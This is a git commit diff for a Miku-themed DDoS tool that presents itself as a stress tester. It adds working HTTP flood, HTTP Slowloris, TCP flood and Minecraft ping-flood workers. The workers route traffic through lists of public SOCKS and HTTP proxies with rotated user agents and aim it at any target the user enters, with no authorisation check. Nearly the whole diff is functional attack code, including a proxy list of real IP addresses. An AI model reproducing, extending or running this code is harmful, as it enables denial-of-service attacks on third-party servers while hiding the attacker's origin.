feature: 🤺 better proxy parsing, added methods: slowloris, mc ping, tcp flood

This commit is contained in:
Sammwy 2025-01-21 08:32:10 -03:00
parent dceb9dafc8
commit e0f33c00cc
No known key found for this signature in database
GPG key ID: E6B924CEF399DE44
17 changed files with 634 additions and 114 deletions

View file

@ -13,7 +13,10 @@ A fun and visually appealing stress testing server with a **Miku-themed** fronte
- 📊 **Live Stats**: Track the success and failure of each attack in real-time. See how many packets are sent and whether they succeed or fail. - 📊 **Live Stats**: Track the success and failure of each attack in real-time. See how many packets are sent and whether they succeed or fail.
- 🖼️ **Aesthetic Design**: A visually cute interface to make your experience enjoyable. 🌸 - 🖼️ **Aesthetic Design**: A visually cute interface to make your experience enjoyable. 🌸
- 📡 **Attack Methods:**: - 📡 **Attack Methods:**:
- `HTTP` - Send HTTP requests - `HTTP Flood` - Send random HTTP requests
- `HTTP Slowloris` - Send HTTP requests and keep the connection open
- `Minecraft Ping` - Send Minecraft ping/motd requests
- `TCP Flood` - Send random TCP packets
## Setup 🛠️ ## Setup 🛠️
@ -58,7 +61,7 @@ Make sure you have the following installed:
Once the server is up and running, you can interact with it via the frontend: Once the server is up and running, you can interact with it via the frontend:
1. **Start Attack**: 1. **Start Attack**:
- Set up the attack parameters: target URL, attack method (HTTP, etc.), packet size, duration, and delay. - Set up the attack parameters: target URL, attack method (HTTP Flood, Slowloris, TCP, etc...), packet size, duration, and delay.
- Press "Start Attack" to initiate the stress test. - Press "Start Attack" to initiate the stress test.
2. **Stop Attack**: 2. **Stop Attack**:
@ -69,7 +72,7 @@ Once the server is up and running, you can interact with it via the frontend:
```json ```json
{ {
"target": "http://example.com", "target": "http://example.com",
"attackMethod": "http", "attackMethod": "http_flood",
"packetSize": 512, "packetSize": 512,
"duration": 60, "duration": 60,
"packetDelay": 500 "packetDelay": 500
@ -83,8 +86,6 @@ Each attack type is handled in a separate worker thread, ensuring that the main
## To-Do 📝 ## To-Do 📝
- Add more attack methods: - Add more attack methods:
- Minecraft 🎮
- TCP 💻
- UDP 🌐 - UDP 🌐
- DNS 📡 - DNS 📡
- And more! 🔥 - And more! 🔥
@ -107,12 +108,13 @@ For example:
```javascript ```javascript
const attackHandlers = { const attackHandlers = {
http: "./workers/httpAttack.js", http_flood: "./workers/httpFloodAttack.js",
minecraft: "./workers/minecraftAttack.js", http_slowloris: "./workers/httpSlowlorisAttack.js",
udp: "./workers/udpAttack.js", tcp_flood: "./workers/tcpFloodAttack.js",
tcp: "./workers/tcpAttack.js", minecraft_ping: "./workers/minecraftPingAttack.js",
dns: "./workers/dnsAttack.js",
// Add more protocols as needed! // Add more protocols as needed!
your_protocol: "./workers/yourProtocolAttack.js"
}; };
``` ```

BIN
bun.lockb

Binary file not shown.

View file

@ -1,8 +1,3 @@
http://219.129.167.82:2222
http://165.232.129.150:80
http://103.86.109.38:80
http://8.219.97.248:80
http://103.49.202.252:80
socks4://199.58.184.97:4145 socks4://199.58.184.97:4145
socks4://192.111.139.163:19404 socks4://192.111.139.163:19404
socks4://199.187.210.54:4145 socks4://199.187.210.54:4145

View file

@ -5,7 +5,7 @@
"type": "module", "type": "module",
"scripts": { "scripts": {
"dev": "concurrently --ks SIGKILL -n \"Client,Server\" \"npm run dev:client\" \"npm run dev:server\"", "dev": "concurrently --ks SIGKILL -n \"Client,Server\" \"npm run dev:client\" \"npm run dev:server\"",
"dev:server": "node server/index.js", "dev:server": "tsx watch server/",
"dev:client": "vite", "dev:client": "vite",
"build": "vite build", "build": "vite build",
"lint": "eslint .", "lint": "eslint .",
@ -19,10 +19,13 @@
"react": "^18.3.1", "react": "^18.3.1",
"react-dom": "^18.3.1", "react-dom": "^18.3.1",
"socket.io": "^4.7.4", "socket.io": "^4.7.4",
"socket.io-client": "^4.7.4" "socket.io-client": "^4.7.4",
"socks-proxy-agent": "^8.0.5",
"tsx": "^4.19.2"
}, },
"devDependencies": { "devDependencies": {
"@eslint/js": "^9.9.1", "@eslint/js": "^9.9.1",
"@types/express": "^5.0.0",
"@types/react": "^18.3.5", "@types/react": "^18.3.5",
"@types/react-dom": "^18.3.0", "@types/react-dom": "^18.3.0",
"@vitejs/plugin-react": "^4.3.1", "@vitejs/plugin-react": "^4.3.1",

View file

@ -1,12 +1,14 @@
import fs from "fs"; import fs from "fs";
import { join } from "path"; import { join } from "path";
import { Proxy } from "./lib";
const currentPath = () => { const currentPath = () => {
const path = process.cwd(); const path = process.cwd();
return path === "/" ? "." : path; return path === "/" ? "." : path;
}; };
const loadFileLines = (filePath) => { const loadFileLines = (filePath: string) => {
try { try {
return fs return fs
.readFileSync(filePath, "utf8") .readFileSync(filePath, "utf8")
@ -24,11 +26,11 @@ export function loadUserAgents() {
return loadFileLines(join(currentPath(), "data/uas.txt")); return loadFileLines(join(currentPath(), "data/uas.txt"));
} }
export function loadProxies() { export function loadProxies(): Proxy[] {
const lines = loadFileLines(join(currentPath(), "data/proxies.txt")); const lines = loadFileLines(join(currentPath(), "data/proxies.txt"));
return lines.map((line) => { return lines.map((line) => {
const [protocol, addr] = line.split("://"); const [protocol, addr] = line.split("://");
const [host, port] = addr.split(":"); const [host, port] = addr.split(":");
return { protocol, host, port }; return { protocol, host, port: parseInt(port) };
}); });
} }

View file

@ -5,12 +5,16 @@ import { Server } from "socket.io";
import { fileURLToPath } from "url"; import { fileURLToPath } from "url";
import { Worker } from "worker_threads"; import { Worker } from "worker_threads";
import { loadProxies, loadUserAgents } from "./utils/fileLoader.js"; import { loadProxies, loadUserAgents } from "./fileLoader";
import { filterProxies } from "./utils/proxyUtils.js"; import { AttackMethod } from "./lib";
import { filterProxies } from "./proxyUtils";
// Define the workers based on attack type // Define the workers based on attack type
const attackWorkers = { const attackWorkers: { [key in AttackMethod]: string } = {
http: "./workers/httpAttack.js", http_flood: "./workers/httpFloodAttack.js",
http_slowloris: "./workers/httpSlowlorisAttack.js",
tcp_flood: "./workers/tcpFloodAttack.js",
minecraft_ping: "./workers/minecraftPingAttack.js",
}; };
const __filename = fileURLToPath(import.meta.url); const __filename = fileURLToPath(import.meta.url);
@ -25,8 +29,8 @@ const io = new Server(httpServer, {
}, },
}); });
const proxies = loadProxies(join(__dirname, "../data/proxies.txt")); const proxies = loadProxies();
const userAgents = loadUserAgents(join(__dirname, "../data/uas.txt")); const userAgents = loadUserAgents();
console.log("Proxies loaded:", proxies.length); console.log("Proxies loaded:", proxies.length);
console.log("User agents loaded:", userAgents.length); console.log("User agents loaded:", userAgents.length);
@ -42,7 +46,7 @@ io.on("connection", (socket) => {
}); });
socket.on("startAttack", (params) => { socket.on("startAttack", (params) => {
const { target, duration, packetDelay, attackMethod } = params; const { target, duration, packetDelay, attackMethod, packetSize } = params;
const filteredProxies = filterProxies(proxies, attackMethod); const filteredProxies = filterProxies(proxies, attackMethod);
const attackWorkerFile = attackWorkers[attackMethod]; const attackWorkerFile = attackWorkers[attackMethod];
@ -65,32 +69,37 @@ io.on("connection", (socket) => {
userAgents, userAgents,
duration, duration,
packetDelay, packetDelay,
packetSize,
}, },
}); });
worker.on("message", (message) => socket.emit("stats", message)); worker.on("message", (message) => socket.emit("stats", message));
worker.on("error", (error) => { worker.on("error", (error) => {
console.error(`Worker error: ${error.message}`); console.error(`Worker error: ${error.message}`);
socket.emit("stats", { log: `❌ Worker error: ${error.message}` }); socket.emit("stats", { log: `❌ Worker error: ${error.message}` });
}); });
worker.on("exit", (code) => { worker.on("exit", (code) => {
console.log(`Worker exited with code ${code}`); console.log(`Worker exited with code ${code}`);
socket.emit("attackEnd"); socket.emit("attackEnd");
}); });
socket.worker = worker; socket["worker"] = worker;
}); });
socket.on("stopAttack", () => { socket.on("stopAttack", () => {
if (socket.worker) { const worker = socket["worker"];
socket.worker.terminate(); if (worker) {
worker.terminate();
socket.emit("attackEnd"); socket.emit("attackEnd");
} }
}); });
socket.on("disconnect", () => { socket.on("disconnect", () => {
if (socket.worker) { const worker = socket["worker"];
socket.worker.terminate(); if (worker) {
worker.terminate();
} }
console.log("Client disconnected"); console.log("Client disconnected");
}); });

13
server/lib.ts Normal file
View file

@ -0,0 +1,13 @@
export type ProxyProtocol = "http" | "https" | "socks4" | "socks5" | string;
export interface Proxy {
protocol: ProxyProtocol;
host: string;
port: number;
}
export type AttackMethod =
| "http_flood"
| "http_slowloris"
| "tcp_flood"
| "minecraft_ping";

53
server/proxyUtils.ts Normal file
View file

@ -0,0 +1,53 @@
import { AttackMethod, Proxy, ProxyProtocol } from "./lib";
const DEFAULT_HTTP_PORT = 8080;
const DEFAULT_PROTOCOL: ProxyProtocol = "http";
const COMMON_PORTS: { [port: number]: ProxyProtocol } = {
80: "http",
443: "https",
1080: "socks5",
1081: "socks4",
8080: "http",
8443: "https",
};
const METHODS: { [key in AttackMethod]: ProxyProtocol[] } = {
http_flood: ["http", "https", "socks4", "socks5"],
http_slowloris: ["socks4", "socks5"],
tcp_flood: ["socks4", "socks5"],
minecraft_ping: ["socks4", "socks5"],
};
/**
* Attempts to infer the protocol based on the port.
*/
function inferProtocol(port: number | undefined): ProxyProtocol {
if (port !== undefined && COMMON_PORTS[port]) {
return COMMON_PORTS[port];
}
return DEFAULT_PROTOCOL;
}
/**
* Ensures a proxy object is safe and normalized by adding default values if missing.
*/
function normalizeProxy(proxy: Proxy): Proxy {
const normalizedPort = proxy.port || DEFAULT_HTTP_PORT;
const normalizedProtocol = proxy.protocol || inferProtocol(normalizedPort);
return {
...proxy,
port: normalizedPort,
protocol: normalizedProtocol,
};
}
/**
* Filters proxies based on the attack method and ensures safe parsing of proxies.
*/
export function filterProxies(proxies: Proxy[], method: AttackMethod): Proxy[] {
return proxies
.map(normalizeProxy)
.filter((proxy) => METHODS[method].includes(proxy.protocol));
}

177
server/utils/mcUtils.js Normal file
View file

@ -0,0 +1,177 @@
// Adapted from: https://github.com/Cryptkeeper/mcping-js/
import net from "net";
import { SocksProxyAgent } from "socks-proxy-agent";
class MinecraftProtocol {
static writeVarInt(val) {
// "VarInts are never longer than 5 bytes"
// https://wiki.vg/Data_types#VarInt_and_VarLong
const buf = Buffer.alloc(5);
let written = 0;
while (true) {
if ((val & 0xffffff80) === 0) {
buf.writeUInt8(val, written++);
break;
} else {
buf.writeUInt8((val & 0x7f) | 0x80, written++);
val >>>= 7;
}
}
return buf.slice(0, written);
}
static writeString(val) {
return Buffer.from(val, "UTF-8");
}
static writeUShort(val) {
return Buffer.from([val >> 8, val & 0xff]);
}
static concat(chunks) {
let length = 0;
for (const chunk of chunks) {
length += chunk.length;
}
const buf = [MinecraftProtocol.writeVarInt(length), ...chunks];
return Buffer.concat(buf);
}
}
class MinecraftBufferReader {
constructor(buffer) {
this._buffer = buffer;
this._offset = 0;
}
readVarInt() {
let val = 0;
let count = 0;
while (true) {
const b = this._buffer.readUInt8(this._offset++);
val |= (b & 0x7f) << (count++ * 7);
if ((b & 0x80) != 128) {
break;
}
}
return val;
}
readString() {
const length = this.readVarInt();
const val = this._buffer.toString(
"UTF-8",
this._offset,
this._offset + length
);
// Advance the reader index forward by the string length
this._offset += length;
return val;
}
offset() {
return this._offset;
}
}
export function pingMinecraftServer(host, port, proxy) {
return new Promise((resolve, reject) => {
const { protocol, host: proxyHost, port: proxyPort } = proxy;
const agent = new SocksProxyAgent(
`${protocol}://${proxyHost}:${proxyPort}`
);
const socket = net.createConnection({
host: host,
port: port,
agent: agent,
});
const timeoutTask = setTimeout(() => {
socket.emit("error", new Error("Socket timeout"));
}, 5000);
const closeSocket = () => {
socket.destroy();
clearTimeout(timeoutTask);
};
let didFireError = false;
const handleErr = (err) => {
closeSocket();
if (!didFireError) {
didFireError = true;
reject(err);
}
};
socket.setNoDelay(true);
socket.on("connect", () => {
const handshake = MinecraftProtocol.concat([
MinecraftProtocol.writeVarInt(0),
MinecraftProtocol.writeVarInt(340),
MinecraftProtocol.writeVarInt(host.length),
MinecraftProtocol.writeString(host),
MinecraftProtocol.writeUShort(port),
MinecraftProtocol.writeVarInt(1),
]);
socket.write(handshake);
const request = MinecraftProtocol.concat([
MinecraftProtocol.writeVarInt(0),
]);
socket.write(request);
});
let incomingBuffer = Buffer.alloc(0);
socket.on("data", (data) => {
incomingBuffer = Buffer.concat([incomingBuffer, data]);
if (incomingBuffer.length < 5) {
return;
}
const bufferReader = new MinecraftBufferReader(incomingBuffer);
const length = bufferReader.readVarInt();
if (incomingBuffer.length - bufferReader.offset() < length) {
return;
}
const id = bufferReader.readVarInt();
if (id === 0) {
const reply = bufferReader.readString();
try {
const message = JSON.parse(reply);
resolve(message);
closeSocket();
} catch (err) {
handleErr(err);
}
} else {
handleErr(new Error("Received unexpected packet"));
}
});
socket.on("error", handleErr);
});
}

View file

@ -1,9 +0,0 @@
const METHODS = {
http: ["http", "https"],
tcp: ["socks4", "socks5"],
udp: ["socks4", "socks5"],
};
export function filterProxies(proxies, method) {
return proxies.filter((proxy) => METHODS[method].includes(proxy.protocol));
}

View file

@ -0,0 +1,18 @@
export function randomBoolean() {
return Math.random() < 0.5;
}
export function randomString(length) {
let result = "";
const characters =
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
const charactersLength = characters.length;
for (let i = 0; i < length; i++) {
result += characters.charAt(Math.floor(Math.random() * charactersLength));
}
return result;
}
export function randomInteger(min, max) {
return Math.floor(Math.random() * (max - min + 1)) + min;
}

View file

@ -1,49 +0,0 @@
import axios from "axios";
import { parentPort, workerData } from "worker_threads";
const startAttack = () => {
const { target, proxies, userAgents, duration, packetDelay } = workerData;
let fixedTarget = target.startsWith("http") ? target : `http://${target}`;
let totalPackets = 0;
const startTime = Date.now();
const sendRequest = async (proxy, userAgent) => {
try {
await axios.get(fixedTarget, {
proxy: { host: proxy.host, port: proxy.port },
headers: { "User-Agent": userAgent },
timeout: 2000,
});
totalPackets++;
parentPort.postMessage({
log: `✅ Request successful from ${proxy.host}:${proxy.port} to ${fixedTarget}`,
totalPackets,
});
} catch (error) {
parentPort.postMessage({
log: `❌ Request failed from ${proxy.host}:${proxy.port} to ${fixedTarget}: ${error.message}`,
totalPackets,
});
}
};
const interval = setInterval(() => {
const elapsedTime = (Date.now() - startTime) / 1000;
if (elapsedTime >= duration) {
clearInterval(interval);
parentPort.postMessage({ log: "Attack finished", totalPackets });
process.exit(0);
}
const proxy = proxies[Math.floor(Math.random() * proxies.length)];
const userAgent = userAgents[Math.floor(Math.random() * userAgents.length)];
sendRequest(proxy, userAgent);
}, packetDelay);
};
if (workerData) {
startAttack();
}

View file

@ -0,0 +1,76 @@
import axios from "axios";
import { SocksProxyAgent } from "socks-proxy-agent";
import { parentPort, workerData } from "worker_threads";
import { randomBoolean, randomString } from "../utils/randomUtils.js";
const startAttack = () => {
const { target, proxies, userAgents, duration, packetDelay, packetSize } =
workerData;
const fixedTarget = target.startsWith("http") ? target : `https://${target}`;
let totalPackets = 0;
const startTime = Date.now();
const sendRequest = async (proxy, userAgent) => {
try {
const config = {
headers: { "User-Agent": userAgent },
timeout: 2000,
validateStatus: (status) => {
return status < 500;
},
};
if (proxy.protocol === "http") {
config.proxy = {
host: proxy.host,
port: proxy.port,
};
} else if (proxy.protocol === "socks4" || proxy.protocol === "socks5") {
config.httpAgent = new SocksProxyAgent(
`${proxy.protocol}://${proxy.host}:${proxy.port}`
);
}
const isGet = packetSize > 64 ? false : randomBoolean();
const payload = randomString(packetSize);
if (isGet) {
await axios.get(`${fixedTarget}/${payload}`, config);
} else {
await axios.post(fixedTarget, payload, config);
}
totalPackets++;
parentPort.postMessage({
log: `✅ Request successful from ${proxy.protocol}://${proxy.host}:${proxy.port} to ${fixedTarget}`,
totalPackets,
});
} catch (error) {
parentPort.postMessage({
log: `❌ Request failed from ${proxy.protocol}://${proxy.host}:${proxy.port} to ${fixedTarget}: ${error.message}`,
totalPackets,
});
}
};
const interval = setInterval(() => {
const elapsedTime = (Date.now() - startTime) / 1000;
if (elapsedTime >= duration) {
clearInterval(interval);
parentPort.postMessage({ log: "Attack finished", totalPackets });
process.exit(0);
}
const proxy = proxies[Math.floor(Math.random() * proxies.length)];
const userAgent = userAgents[Math.floor(Math.random() * userAgents.length)];
sendRequest(proxy, userAgent);
}, packetDelay);
};
if (workerData) {
startAttack();
}

View file

@ -0,0 +1,85 @@
import http from "http";
import { SocksProxyAgent } from "socks-proxy-agent";
import { parentPort, workerData } from "worker_threads";
import { randomString } from "../utils/randomUtils.js";
const startAttack = () => {
const { target, proxies, userAgents, duration, packetDelay, packetSize } =
workerData;
const fixedTarget = target.startsWith("http") ? target : `http://${target}`;
const protocolPort = target.startsWith("https") ? 443 : 80;
const targetPort = fixedTarget.includes(":")
? parseInt(fixedTarget.split(":")[2])
: protocolPort;
const targetHost = fixedTarget.replace(/^https?:\/\//, "");
let totalPackets = 0;
const startTime = Date.now();
const sendRequest = async (proxy, userAgent) => {
const options = {
hostname: targetHost,
port: targetPort,
path: "/",
method: "POST",
headers: {
"User-Agent": userAgent,
Connection: "keep-alive",
"Transfer-Encoding": "chunked",
Host: targetHost,
},
agent: new SocksProxyAgent(
`${proxy.protocol}://${proxy.host}:${proxy.port}`
),
};
const req = http.request(options, (res) => {
res.on("data", () => {});
res.on("end", () => {});
});
req.on("error", (err) => {
parentPort.postMessage({
log: `❌ Request failed from ${proxy.protocol}://${proxy.host}:${proxy.port} to ${fixedTarget}: ${err.message}`,
totalPackets,
});
});
req.on("close", () => {
parentPort.postMessage({
log: `⚠ Connection closed from ${proxy.protocol}://${proxy.host}:${proxy.port} to ${fixedTarget}`,
totalPackets,
});
});
const payload = randomString(packetSize);
req.write(payload);
totalPackets++;
parentPort.postMessage({
log: `✅ Request sent from ${proxy.protocol}://${proxy.host}:${proxy.port} to ${fixedTarget}`,
totalPackets,
});
};
const interval = setInterval(() => {
const elapsedTime = (Date.now() - startTime) / 1000;
if (elapsedTime >= duration) {
clearInterval(interval);
parentPort.postMessage({ log: "Attack finished", totalPackets });
process.exit(0);
}
const proxy = proxies[Math.floor(Math.random() * proxies.length)];
const userAgent = userAgents[Math.floor(Math.random() * userAgents.length)];
sendRequest(proxy, userAgent);
}, packetDelay);
};
if (workerData) {
startAttack();
}

View file

@ -0,0 +1,49 @@
import { parentPort, workerData } from "worker_threads";
import { pingMinecraftServer } from "../utils/mcUtils.js";
const startAttack = () => {
const { target, proxies, duration, packetDelay } = workerData;
const [targetHost, targetPort] = target.split(":");
const parsedPort = parseInt(targetPort || "25565", 10);
const fixedTarget = `tcp://${targetHost}:${parsedPort}`;
let totalPackets = 0;
const startTime = Date.now();
const interval = setInterval(() => {
const elapsedTime = (Date.now() - startTime) / 1000;
if (elapsedTime >= duration) {
clearInterval(interval);
parentPort.postMessage({ log: "Attack finished", totalPackets });
process.exit(0);
}
const proxy = proxies[Math.floor(Math.random() * proxies.length)];
pingMinecraftServer(targetHost, parsedPort, proxy)
.then((status) => {
totalPackets++;
const players = status?.players?.online || 0;
const max = status?.players?.max || 0;
const version = status?.version?.name || "";
const banner = `${version}: ${players}/${max}`;
parentPort.postMessage({
log: `✅ MC Ping+MOTD Request from ${proxy.protocol}://${proxy.host}:${proxy.port} to ${fixedTarget} (${banner})`,
totalPackets,
});
})
.catch((e) => {
parentPort.postMessage({
log: `❌ MC Ping+MOTD Request failed from ${proxy.protocol}://${proxy.host}:${proxy.port} to ${fixedTarget}: ${e.message}`,
totalPackets,
});
});
}, packetDelay);
};
if (workerData) {
startAttack();
}

View file

@ -0,0 +1,74 @@
import net from "net";
import { SocksProxyAgent } from "socks-proxy-agent";
import { parentPort, workerData } from "worker_threads";
import { randomString } from "../utils/randomUtils.js";
const startAttack = () => {
const { target, proxies, duration, packetDelay, packetSize } = workerData;
const [targetHost, targetPort] = target.split(":");
const port = parseInt(targetPort, 10);
const fixedTarget = target.startsWith("http") ? target : `tcp://${target}`;
let totalPackets = 0;
const startTime = Date.now();
const sendPacket = async (proxy) => {
const socket = new net.Socket();
let open = false;
socket.setTimeout(2000);
const proxyAgent = new SocksProxyAgent(
`${proxy.protocol}://${proxy.host}:${proxy.port}`
);
setInterval(() => {
if (socket.writable && open) {
socket.write(randomString(packetSize));
}
}, [1000]);
socket.connect({ host: targetHost, port: port, agent: proxyAgent }, () => {
totalPackets++;
open = true;
parentPort.postMessage({
log: `✅ Packet sent from ${proxy.protocol}://${proxy.host}:${proxy.port} to ${fixedTarget}`,
totalPackets,
});
});
socket.on("close", () => {
open = false;
});
socket.on("timeout", () => {
socket.destroy();
open = false;
});
socket.on("error", (err) => {
parentPort.postMessage({
log: `❌ Packet failed from ${proxy.protocol}://${proxy.host}:${proxy.port} to ${fixedTarget}: ${err.message}`,
totalPackets,
});
});
};
const interval = setInterval(() => {
const elapsedTime = (Date.now() - startTime) / 1000;
if (elapsedTime >= duration) {
clearInterval(interval);
parentPort.postMessage({ log: "Attack finished", totalPackets });
process.exit(0);
}
const proxy = proxies[Math.floor(Math.random() * proxies.length)];
sendPacket(proxy);
}, packetDelay);
};
if (workerData) {
startAttack();
}

View file

@ -10,7 +10,7 @@ function App() {
const [logs, setLogs] = useState<string[]>([]); const [logs, setLogs] = useState<string[]>([]);
const [progress, setProgress] = useState(0); const [progress, setProgress] = useState(0);
const [target, setTarget] = useState(""); const [target, setTarget] = useState("");
const [attackMethod, setAttackMethod] = useState("http"); const [attackMethod, setAttackMethod] = useState("http_flood");
const [packetSize, setPacketSize] = useState(64); const [packetSize, setPacketSize] = useState(64);
const [duration, setDuration] = useState(60); const [duration, setDuration] = useState(60);
const [packetDelay, setPacketDelay] = useState(100); const [packetDelay, setPacketDelay] = useState(100);
@ -94,7 +94,7 @@ function App() {
setLogs((prev) => [message, ...prev].slice(0, 12)); setLogs((prev) => [message, ...prev].slice(0, 12));
}; };
const startAttack = () => { const startAttack = (isQuick?: boolean) => {
if (!target.trim()) { if (!target.trim()) {
alert("Please enter a target!"); alert("Please enter a target!");
return; return;
@ -110,21 +110,24 @@ function App() {
// Play audio // Play audio
if (audioRef.current) { if (audioRef.current) {
audioRef.current.currentTime = 0; audioRef.current.currentTime = isQuick ? 9.5 : 0;
audioRef.current.play(); audioRef.current.play();
} }
// Start attack after audio intro // Start attack after audio intro
const timeout = setTimeout(() => { const timeout = setTimeout(
setActuallyAttacking(true); () => {
socket.emit("startAttack", { setActuallyAttacking(true);
target, socket.emit("startAttack", {
packetSize, target,
duration, packetSize,
packetDelay, duration,
attackMethod, packetDelay,
}); attackMethod,
}, 10250); });
},
isQuick ? 700 : 10250
);
setCurrentTask(timeout); setCurrentTask(timeout);
}; };
@ -175,10 +178,11 @@ function App() {
className="px-4 py-2 rounded-lg border border-pink-200 focus:border-pink-500 focus:ring-2 focus:ring-pink-200 outline-none" className="px-4 py-2 rounded-lg border border-pink-200 focus:border-pink-500 focus:ring-2 focus:ring-pink-200 outline-none"
disabled={isAttacking} disabled={isAttacking}
/> />
<button <div className="flex gap-2 items-center">
onClick={isAttacking ? stopAttack : startAttack} <button
className={` onClick={() => (isAttacking ? stopAttack() : startAttack())}
px-8 py-2 rounded-lg font-semibold text-white transition-all className={`
px-8 py-2 rounded-lg font-semibold text-white transition-all w-full
${ ${
isAttacking isAttacking
? "bg-red-500 hover:bg-red-600" ? "bg-red-500 hover:bg-red-600"
@ -186,10 +190,27 @@ function App() {
} }
flex items-center justify-center gap-2 flex items-center justify-center gap-2
`} `}
> >
<Wand2 className="w-5 h-5" /> <Wand2 className="w-5 h-5" />
{isAttacking ? "Stop Beam" : "Start Miku Beam"} {isAttacking ? "Stop Beam" : "Start Miku Beam"}
</button> </button>
<button
onClick={() =>
isAttacking ? stopAttack() : startAttack(true)
}
className={`
px-2 py-2 rounded-lg font-semibold text-white transition-all
${
isAttacking
? "bg-gray-500 hover:bg-red-600"
: "bg-cyan-500 hover:bg-cyan-600"
}
flex items-center justify-center gap-2
`}
>
<Zap className="w-5 h-5" />
</button>
</div>
</div> </div>
<div className="grid grid-cols-4 gap-4"> <div className="grid grid-cols-4 gap-4">
@ -203,9 +224,10 @@ function App() {
className="w-full px-4 py-2 rounded-lg border border-pink-200 focus:border-pink-500 focus:ring-2 focus:ring-pink-200 outline-none" className="w-full px-4 py-2 rounded-lg border border-pink-200 focus:border-pink-500 focus:ring-2 focus:ring-pink-200 outline-none"
disabled={isAttacking} disabled={isAttacking}
> >
<option value="http">HTTP</option> <option value="http_flood">HTTP/Flood</option>
<option value="tcp">TCP</option> <option value="http_slowloris">HTTP/Slowloris</option>
<option value="udp">UDP</option> <option value="tcp_flood">TCP/Flood</option>
<option value="minecraft_ping">Minecraft/Ping</option>
</select> </select>
</div> </div>
<div> <div>